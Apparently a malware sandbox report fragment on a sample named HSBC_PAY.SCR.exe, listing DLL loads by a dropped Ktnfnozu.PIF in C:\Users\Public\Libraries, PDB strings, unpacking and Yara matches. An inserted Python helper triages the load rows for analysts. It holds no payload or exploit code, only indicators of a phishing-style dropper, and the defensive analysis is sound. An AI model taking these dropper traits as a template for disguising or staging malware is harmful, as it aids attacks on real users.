                      Source: C:\Users\Public\Libraries\Ktnfnozu.PIFSection loaded: cryptdll.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Ktnfnozu.PIFSection loaded: spp.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Ktnfnozu.PIFSection loaded: vssapi.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Ktnfnozu.PIFSection loaded: vsstrace.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Ktnfnozu.PIFSection loaded: spp.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Ktnfnozu.PIFSection loaded: vssapi.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Ktnfnozu.PIFSection loaded: vsstrace.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Ktnfnozu.PIFSection loaded: mssip32.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Ktnfnozu.PIFSection loaded: msasn1.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Ktnfnozu.PIFSection loaded: endpointdlp.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Ktnfnozu.PIFSection loaded: endpointdlp.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Ktnfnozu.PIFSection loaded: endpointdlp.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Ktnfnozu.PIFSection loaded: endpointdlp.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Ktnfnozu.PIFSection loaded: advapi.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Ktnfnozu.PIFSection loaded: advapi.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Ktnfnozu.PIFSection loaded: advapi.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Ktnfnozu.PIFSection loaded: advapi.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Ktnfnozu.PIFSection loaded: advapi.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Ktnfnozu.PIFSection loaded: advapi.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Ktnfnozu.PIFSection loaded: advapi.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Ktnfnozu.PIFSection loaded: spp.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Ktnfnozu.PIFSection loaded: vssapi.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Ktnfnozu.PIFSection loaded: vsstrace.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Ktnfnozu.PIFSection loaded: sppwmi.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Ktnfnozu.PIFSection loaded: slc.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Ktnfnozu.PIFSection loaded: sppc.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Ktnfnozu.PIFSection loaded: sppcext.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Ktnfnozu.PIFSection loaded: sppc.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Ktnfnozu.PIFSection loaded: winscard.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Ktnfnozu.PIFSection loaded: devobj.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Ktnfnozu.PIFSection loaded: cryptsp.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Ktnfnozu.PIFSection loaded: rsaenh.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Ktnfnozu.PIFSection loaded: cryptbase.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Ktnfnozu.PIFSection loaded: msasn1.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Ktnfnozu.PIFSection loaded: sppc.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Ktnfnozu.PIFSection loaded: sppc.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Ktnfnozu.PIFSection loaded: version.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Ktnfnozu.PIFSection loaded: uxtheme.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Ktnfnozu.PIFSection loaded: url.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Ktnfnozu.PIFSection loaded: ieframe.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Ktnfnozu.PIFSection loaded: iertutil.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Ktnfnozu.PIFSection loaded: netapi32.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Ktnfnozu.PIFSection loaded: userenv.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Ktnfnozu.PIFSection loaded: winhttp.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Ktnfnozu.PIFSection loaded: wkscli.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Ktnfnozu.PIFSection loaded: netutils.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Ktnfnozu.PIFSection loaded: amsi.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Ktnfnozu.PIFSection loaded: smartscreenps.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Ktnfnozu.PIFSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Ktnfnozu.PIFSection loaded: winmm.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Ktnfnozu.PIFSection loaded: wininet.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Ktnfnozu.PIFSection loaded: sspicli.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Ktnfnozu.PIFSection loaded: windows.storage.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Ktnfnozu.PIFSection loaded: wldp.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Ktnfnozu.PIFSection loaded: profapi.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Ktnfnozu.PIFSection loaded: ondemandconnroutehelper.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Ktnfnozu.PIFSection loaded: ieproxy.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Ktnfnozu.PIFSection loaded: ieproxy.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Ktnfnozu.PIFSection loaded: ieproxy.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Ktnfnozu.PIFSection loaded: msasn1.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Ktnfnozu.PIFSection loaded: msasn1.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Ktnfnozu.PIFSection loaded: msasn1.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Ktnfnozu.PIFSection loaded: mssip32.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Ktnfnozu.PIFSection loaded: msasn1.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Ktnfnozu.PIFSection loaded: mssip32.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Ktnfnozu.PIFSection loaded: msasn1.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Ktnfnozu.PIFSection loaded: mssip32.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Ktnfnozu.PIFSection loaded: msasn1.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Ktnfnozu.PIFSection loaded: ??????????.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Ktnfnozu.PIFSection loaded: ??.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Ktnfnozu.PIFSection loaded: mswsock.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Ktnfnozu.PIFSection loaded: iphlpapi.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Ktnfnozu.PIFSection loaded: winnsi.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Ktnfnozu.PIFSection loaded: am.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Ktnfnozu.PIFSection loaded: am.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Ktnfnozu.PIFSection loaded: am.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Ktnfnozu.PIFSection loaded: am.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Ktnfnozu.PIFSection loaded: am.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Ktnfnozu.PIFSection loaded: am.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Ktnfnozu.PIFSection loaded: am.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Ktnfnozu.PIFSection loaded: am.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Ktnfnozu.PIFSection loaded: am.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Ktnfnozu.PIFSection loaded: am.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Ktnfnozu.PIFSection loaded: am.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Ktnfnozu.PIFSection loaded: am.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Ktnfnozu.PIFSection loaded: am.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Ktnfnozu.PIFSection loaded: sppc.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Ktnfnozu.PIFSection loaded: am.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Ktnfnozu.PIFSection loaded: am.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Ktnfnozu.PIFSection loaded: am.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Ktnfnozu.PIFSection loaded: am.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Ktnfnozu.PIFSection loaded: am.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Ktnfnozu.PIFSection loaded: am.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Ktnfnozu.PIFSection loaded: am.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Ktnfnozu.PIFSection loaded: am.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Ktnfnozu.PIFSection loaded: am.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Ktnfnozu.PIFSection loaded: am.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Ktnfnozu.PIFSection loaded: am.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Ktnfnozu.PIFSection loaded: am.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Ktnfnozu.PIFSection loaded: am.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Ktnfnozu.PIFSection loaded: am.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Ktnfnozu.PIFSection loaded: am.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Ktnfnozu.PIFSection loaded: am.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Ktnfnozu.PIFSection loaded: am.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Ktnfnozu.PIFSection loaded: am.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Ktnfnozu.PIFSection loaded: am.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Ktnfnozu.PIFSection loaded: am.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Ktnfnozu.PIFSection loaded: am.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Ktnfnozu.PIFSection loaded: am.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Ktnfnozu.PIFSection loaded: am.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Ktnfnozu.PIFSection loaded: am.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Ktnfnozu.PIFSection loaded: am.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Ktnfnozu.PIFSection loaded: am.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Ktnfnozu.PIFSection loaded: am.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Ktnfnozu.PIFSection loaded: am.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Ktnfnozu.PIFSection loaded: am.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Ktnfnozu.PIFSection loaded: am.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Ktnfnozu.PIFSection loaded: am.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Ktnfnozu.PIFSection loaded: am.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Ktnfnozu.PIFSection loaded: am.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Ktnfnozu.PIFSection loaded: am.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Ktnfnozu.PIFSection loaded: am.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Ktnfnozu.PIFSection loaded: ???.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Ktnfnozu.PIFSection loaded: ???.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Ktnfnozu.PIFSection loaded: ???.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Ktnfnozu.PIFSection loaded: am.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Ktnfnozu.PIFSection loaded: ??l.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Ktnfnozu.PIFSection loaded: ??l.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Ktnfnozu.PIFSection loaded: ?.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Ktnfnozu.PIFSection loaded: ?.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Ktnfnozu.PIFSection loaded: ??l.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Ktnfnozu.PIFSection loaded: ????.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Ktnfnozu.PIFSection loaded: ???e???????????.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Ktnfnozu.PIFSection loaded: ???e???????????.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Ktnfnozu.PIFSection loaded: ?.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Ktnfnozu.PIFSection loaded: ?.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Ktnfnozu.PIFSection loaded: ?.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Ktnfnozu.PIFSection loaded: ?.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Ktnfnozu.PIFSection loaded: ??l.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Ktnfnozu.PIFSection loaded: ??l.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Ktnfnozu.PIFSection loaded: sppc.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Ktnfnozu.PIFSection loaded: sppc.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Ktnfnozu.PIFSection loaded: sppc.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Ktnfnozu.PIFSection loaded: sppc.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Ktnfnozu.PIFSection loaded: tquery.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Ktnfnozu.PIFSection loaded: cryptdll.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Ktnfnozu.PIFSection loaded: spp.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Ktnfnozu.PIFSection loaded: vssapi.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Ktnfnozu.PIFSection loaded: vsstrace.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Ktnfnozu.PIFSection loaded: spp.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Ktnfnozu.PIFSection loaded: vssapi.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Ktnfnozu.PIFSection loaded: vsstrace.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Ktnfnozu.PIFSection loaded: mssip32.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Ktnfnozu.PIFSection loaded: msasn1.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Ktnfnozu.PIFSection loaded: endpointdlp.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Ktnfnozu.PIFSection loaded: endpointdlp.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Ktnfnozu.PIFSection loaded: endpointdlp.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Ktnfnozu.PIFSection loaded: endpointdlp.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Ktnfnozu.PIFSection loaded: advapi.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Ktnfnozu.PIFSection loaded: advapi.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Ktnfnozu.PIFSection loaded: advapi.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Ktnfnozu.PIFSection loaded: advapi.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Ktnfnozu.PIFSection loaded: advapi.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Ktnfnozu.PIFSection loaded: advapi.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Ktnfnozu.PIFSection loaded: advapi.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Ktnfnozu.PIFSection loaded: spp.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Ktnfnozu.PIFSection loaded: vssapi.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Ktnfnozu.PIFSection loaded: vsstrace.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Ktnfnozu.PIFSection loaded: sppwmi.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Ktnfnozu.PIFSection loaded: slc.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Ktnfnozu.PIFSection loaded: sppc.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Ktnfnozu.PIFSection loaded: sppcext.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Ktnfnozu.PIFSection loaded: sppc.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Ktnfnozu.PIFSection loaded: winscard.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Ktnfnozu.PIFSection loaded: devobj.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Ktnfnozu.PIFSection loaded: cryptsp.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Ktnfnozu.PIFSection loaded: rsaenh.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Ktnfnozu.PIFSection loaded: cryptbase.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Ktnfnozu.PIFSection loaded: msasn1.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Ktnfnozu.PIFSection loaded: sppc.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Ktnfnozu.PIFSection loaded: sppc.dllJump to behavior
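The module-load rows above are long and mostly repetition, and a triager wants three things out of them: which process is loading, how much of the list is noise (the repeated am.dll loads and the unreadable non-ASCII names), and which loads matter for capability (network, crypto, shadow copies, AMSI). The helper below is an added example, not code from the Joe Sandbox report: it parses rows in the exact form rendered on this page (process path fused to the event text, "Jump to behavior" link remnant at the end) as well as a separated "Source: ... | Section loaded: ..." form, collapses duplicates into counts, and flags a loading process that lives under C:\Users\Public with a .pif/.scr/.com extension. The sample rows, the folder/extension policy and the DLL-to-capability table are constructed for the example.

```python
import re
from collections import Counter

# Row format as rendered on this page: "Source: <process>Section loaded: <dll>Jump to behavior".
# A " | " or "; " separator between the two cells is also accepted.
ROW_RE = re.compile(
    r"^\s*Source:\s*(?P<source>.+?)(?:\s*[|;]\s*)?"
    r"Section loaded:\s*(?P<dll>\S+?)(?:Jump to behavior)?\s*$",
    re.IGNORECASE,
)

# Constructed sample rows in the page's own format (not copied from the report).
SAMPLE_ROWS = [
    r"Source: C:\Users\Public\Libraries\Ktnfnozu.PIFSection loaded: winnsi.dllJump to behavior",
    r"Source: C:\Users\Public\Libraries\Ktnfnozu.PIFSection loaded: ??????????.dllJump to behavior",
    r"Source: C:\Users\Public\Libraries\Ktnfnozu.PIFSection loaded: am.dllJump to behavior",
    r"Source: C:\Users\Public\Libraries\Ktnfnozu.PIFSection loaded: am.dllJump to behavior",
    r"Source: C:\Users\Public\Libraries\Ktnfnozu.PIFSection loaded: am.dllJump to behavior",
    r"Source: C:\Users\Public\Libraries\Ktnfnozu.PIF | Section loaded: amsi.dll",
    r"Source: C:\Users\Public\Libraries\Ktnfnozu.PIF | Section loaded: wininet.dll",
    r"Source: C:\Users\Public\Libraries\Ktnfnozu.PIF | Section loaded: vssapi.dll",
    r"Source: C:\Users\Public\Libraries\Ktnfnozu.PIF | Section loaded: rsaenh.dll",
    # Not a module-load row; the parser must skip it.
    r"Source: C:\Users\user\Desktop\HSBC_PAY.SCR.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\X",
]

# Assumed mapping from module to the capability its presence suggests (example table).
CAPABILITY_BY_DLL = {
    "wininet.dll": "HTTP client (WinINet)",
    "winhttp.dll": "HTTP client (WinHTTP)",
    "mswsock.dll": "Winsock service provider",
    "iphlpapi.dll": "adapter/route enumeration",
    "amsi.dll": "Antimalware Scan Interface",
    "cryptsp.dll": "CryptoAPI",
    "rsaenh.dll": "RSA/AES cryptographic provider",
    "vssapi.dll": "Volume Shadow Copy API",
    "netapi32.dll": "NetAPI workstation/domain queries",
}

# Assumed policy: a world-writable public folder plus a legacy executable extension.
PUBLIC_ROOT = "c:\\users\\public\\"
ODD_EXTENSIONS = {".pif", ".scr", ".com"}


def source_is_suspicious(source):
    """True when the loading image sits under C:\\Users\\Public with an odd extension."""
    s = source.lower()
    ext = s[s.rfind("."):] if "." in s else ""
    return s.startswith(PUBLIC_ROOT) and ext in ODD_EXTENSIONS


def triage(rows):
    """Collapse 'Section loaded' rows into per-process counts and capability flags."""
    per_source = {}
    for line in rows:
        m = ROW_RE.match(line)
        if not m:
            continue  # some other event type; ignore
        src, dll = m.group("source"), m.group("dll").lower()
        per_source.setdefault(src, Counter())[dll] += 1

    report = {}
    for src, loads in per_source.items():
        report[src] = {
            "suspicious_source": source_is_suspicious(src),
            "total_loads": sum(loads.values()),
            "distinct_modules": len(loads),
            # Names the report could not render (shown as '?' runs) are counted, not guessed.
            "unreadable_names": sum(n for d, n in loads.items() if "?" in d),
            "most_loaded": loads.most_common(1)[0],
            "capabilities": {d: CAPABILITY_BY_DLL[d] for d in loads if d in CAPABILITY_BY_DLL},
        }
    return report


if __name__ == "__main__":
    for src, summary in triage(SAMPLE_ROWS).items():
        print(src)
        for k, v in summary.items():
            print(f"  {k}: {v}")
```

Run it over a saved copy of the behavior table and the repeated am.dll rows collapse to one count, the "?" names are reported as a number rather than reproduced, and the capability list is what is left to read. The folder/extension policy is deliberately narrow; widen it to match local conventions before using it as a detection.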
                      Source: C:\Users\user\Desktop\HSBC_PAY.SCR.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32
                      Source: Window Recorder | Window detected: More than 3 window changes detected
                      Source: Binary string: E:\Adlice\Truesight\x64\Release\truesight.pdb source: HSBC_PAY.SCR.exe, 00000000.00000002.1719635955.0000000021816000.00000004.00001000.00020000.00000000.sdmp, HSBC_PAY.SCR.exe, 00000000.00000003.1698454245.000000007F0A0000.00000004.00001000.00020000.00000000.sdmp, HSBC_PAY.SCR.exe, 00000000.00000002.1723167222.000000007F5E0000.00000004.00001000.00020000.00000000.sdmp, HSBC_PAY.SCR.exe, 00000000.00000002.1717955033.00000000207A4000.00000004.00001000.00020000.00000000.sdmp, HSBC_PAY.SCR.exe, 00000000.00000002.1719371809.00000000216DE000.00000004.00000020.00020000.00000000.sdmp, HSBC_PAY.SCR.exe, 00000000.00000003.1698278721.000000007F103000.00000004.00001000.00020000.00000000.sdmp, Ktnfnozu.PIF, 00000005.00000002.1906626349.00000000206DF000.00000004.00001000.00020000.00000000.sdmp, Ktnfnozu.PIF, 00000005.00000002.1960770240.0000000021090000.00000004.00000020.00020000.00000000.sdmp, Ktnfnozu.PIF, 00000005.00000003.1845495166.0000000000742000.00000004.00000020.00020000.00000000.sdmp, uzonfntK.pif, 00000008.00000001.1848189708.00000000007F0000.00000040.00000001.00020000.00000000.sdmp, Ktnfnozu.PIF, 0000000B.00000003.1935639045.00000000007AC000.00000004.00000020.00020000.00000000.sdmp, Ktnfnozu.PIF, 0000000B.00000003.1935639045.0000000000804000.00000004.00000020.00020000.00000000.sdmp, uzonfntK.pif, 0000000E.00000002.2255713355.00000000007F0000.00000040.00000400.00020000.00000000.sdmp
                      Source: Binary string: easinvoker.pdb source: HSBC_PAY.SCR.exe, 00000000.00000002.1717955033.0000000020760000.00000004.00001000.00020000.00000000.sdmp, HSBC_PAY.SCR.exe, 00000000.00000002.1723167222.000000007F5E0000.00000004.00001000.00020000.00000000.sdmp, HSBC_PAY.SCR.exe, 00000000.00000002.1717955033.00000000207A4000.00000004.00001000.00020000.00000000.sdmp, HSBC_PAY.SCR.exe, 00000000.00000003.1698278721.000000007F103000.00000004.00001000.00020000.00000000.sdmp, HSBC_PAY.SCR.exe, 00000000.00000003.1698278721.000000007F0F0000.00000004.00001000.00020000.00000000.sdmp, Ktnfnozu.PIF, 00000005.00000002.1906626349.00000000206DF000.00000004.00001000.00020000.00000000.sdmp, Ktnfnozu.PIF, 00000005.00000002.1906626349.0000000020696000.00000004.00001000.00020000.00000000.sdmp, uzonfntK.pif, 00000008.00000001.1848189708.00000000007F0000.00000040.00000001.00020000.00000000.sdmp, uzonfntK.pif, 0000000E.00000002.2255713355.00000000007F0000.00000040.00000400.00020000.00000000.sdmp
                      Source: Binary string: wntdll.pdbUGP source: uzonfntK.pif, 00000003.00000003.1957883570.0000000028DF7000.00000004.00000020.00020000.00000000.sdmp, uzonfntK.pif, 00000003.00000002.2132668058.0000000028FA0000.00000040.00001000.00020000.00000000.sdmp, uzonfntK.pif, 00000003.00000003.1954844272.0000000028C46000.00000004.00000020.00020000.00000000.sdmp, uzonfntK.pif, 00000003.00000002.2132668058.000000002913E000.00000040.00001000.00020000.00000000.sdmp, uzonfntK.pif, 00000008.00000002.2215530629.000000001E95E000.00000040.00001000.00020000.00000000.sdmp, uzonfntK.pif, 00000008.00000002.2215530629.000000001E7C0000.00000040.00001000.00020000.00000000.sdmp, uzonfntK.pif, 00000008.00000003.2136979229.000000001E619000.00000004.00000020.00020000.00000000.sdmp, uzonfntK.pif, 00000008.00000003.2131723538.000000001E339000.00000004.00000020.00020000.00000000.sdmp, uzonfntK.pif, 0000000E.00000003.2193790873.0000000028331000.00000004.00000020.00020000.00000000.sdmp, uzonfntK.pif, 0000000E.00000003.2188220220.000000002818A000.00000004.00000020.00020000.00000000.sdmp, uzonfntK.pif, 0000000E.00000002.2280949456.000000002867E000.00000040.00001000.00020000.00000000.sdmp, uzonfntK.pif, 0000000E.00000002.2280949456.00000000284E0000.00000040.00001000.00020000.00000000.sdmp
                      Source: Binary string: wntdll.pdb source: uzonfntK.pif, uzonfntK.pif, 00000008.00000002.2215530629.000000001E95E000.00000040.00001000.00020000.00000000.sdmp, uzonfntK.pif, 00000008.00000002.2215530629.000000001E7C0000.00000040.00001000.00020000.00000000.sdmp, uzonfntK.pif, 00000008.00000003.2136979229.000000001E619000.00000004.00000020.00020000.00000000.sdmp, uzonfntK.pif, 00000008.00000003.2131723538.000000001E339000.00000004.00000020.00020000.00000000.sdmp, uzonfntK.pif, 0000000E.00000003.2193790873.0000000028331000.00000004.00000020.00020000.00000000.sdmp, uzonfntK.pif, 0000000E.00000003.2188220220.000000002818A000.00000004.00000020.00020000.00000000.sdmp, uzonfntK.pif, 0000000E.00000002.2280949456.000000002867E000.00000040.00001000.00020000.00000000.sdmp, uzonfntK.pif, 0000000E.00000002.2280949456.00000000284E0000.00000040.00001000.00020000.00000000.sdmp
                      Source: Binary string: easinvoker.pdbGCTL source: HSBC_PAY.SCR.exe, 00000000.00000003.1698754941.00000000216B1000.00000004.00000020.00020000.00000000.sdmp, HSBC_PAY.SCR.exe, 00000000.00000003.1698754941.0000000021682000.00000004.00000020.00020000.00000000.sdmp, HSBC_PAY.SCR.exe, 00000000.00000002.1717955033.0000000020760000.00000004.00001000.00020000.00000000.sdmp, HSBC_PAY.SCR.exe, 00000000.00000002.1723167222.000000007F5E0000.00000004.00001000.00020000.00000000.sdmp, HSBC_PAY.SCR.exe, 00000000.00000002.1717955033.00000000207A4000.00000004.00001000.00020000.00000000.sdmp, HSBC_PAY.SCR.exe, 00000000.00000003.1698278721.000000007F103000.00000004.00001000.00020000.00000000.sdmp, HSBC_PAY.SCR.exe, 00000000.00000003.1698278721.000000007F0F0000.00000004.00001000.00020000.00000000.sdmp, Ktnfnozu.PIF, 00000005.00000003.1845221784.0000000000742000.00000004.00000020.00020000.00000000.sdmp, Ktnfnozu.PIF, 00000005.00000002.1906626349.00000000206DF000.00000004.00001000.00020000.00000000.sdmp, Ktnfnozu.PIF, 00000005.00000003.1845221784.000000000076B000.00000004.00000020.00020000.00000000.sdmp, Ktnfnozu.PIF, 00000005.00000002.1906626349.0000000020696000.00000004.00001000.00020000.00000000.sdmp, uzonfntK.pif, 00000008.00000001.1848189708.00000000007F0000.00000040.00000001.00020000.00000000.sdmp, Ktnfnozu.PIF, 0000000B.00000003.1935639045.00000000007AC000.00000004.00000020.00020000.00000000.sdmp, Ktnfnozu.PIF, 0000000B.00000003.1935639045.00000000007D5000.00000004.00000020.00020000.00000000.sdmp, uzonfntK.pif, 0000000E.00000002.2255713355.00000000007F0000.00000040.00000400.00020000.00000000.sdmp

                      Data Obfuscation

                      Source: C:\Users\Public\Libraries\uzonfntK.pif | Unpacked PE file: 3.2.uzonfntK.pif.400000.0.unpack .text:ER;.data:W;.tls:W;.rdata:R;.idata:R;.edata:R;.reloc:R; vs .text:ER;
                      Source: C:\Users\Public\Libraries\uzonfntK.pif | Unpacked PE file: 8.2.uzonfntK.pif.400000.2.unpack .text:ER;.data:W;.tls:W;.rdata:R;.idata:R;.edata:R;.reloc:R; vs .text:ER;
                      Source: C:\Users\Public\Libraries\uzonfntK.pif | Unpacked PE file: 14.2.uzonfntK.pif.400000.2.unpack .text:ER;.data:W;.tls:W;.rdata:R;.idata:R;.edata:R;.reloc:R; vs .text:ER;
                      Source: Yara match | File source: 0.2.HSBC_PAY.SCR.exe.2a80000.1.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 00000008.00000001.1848189708.0000000000F60000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
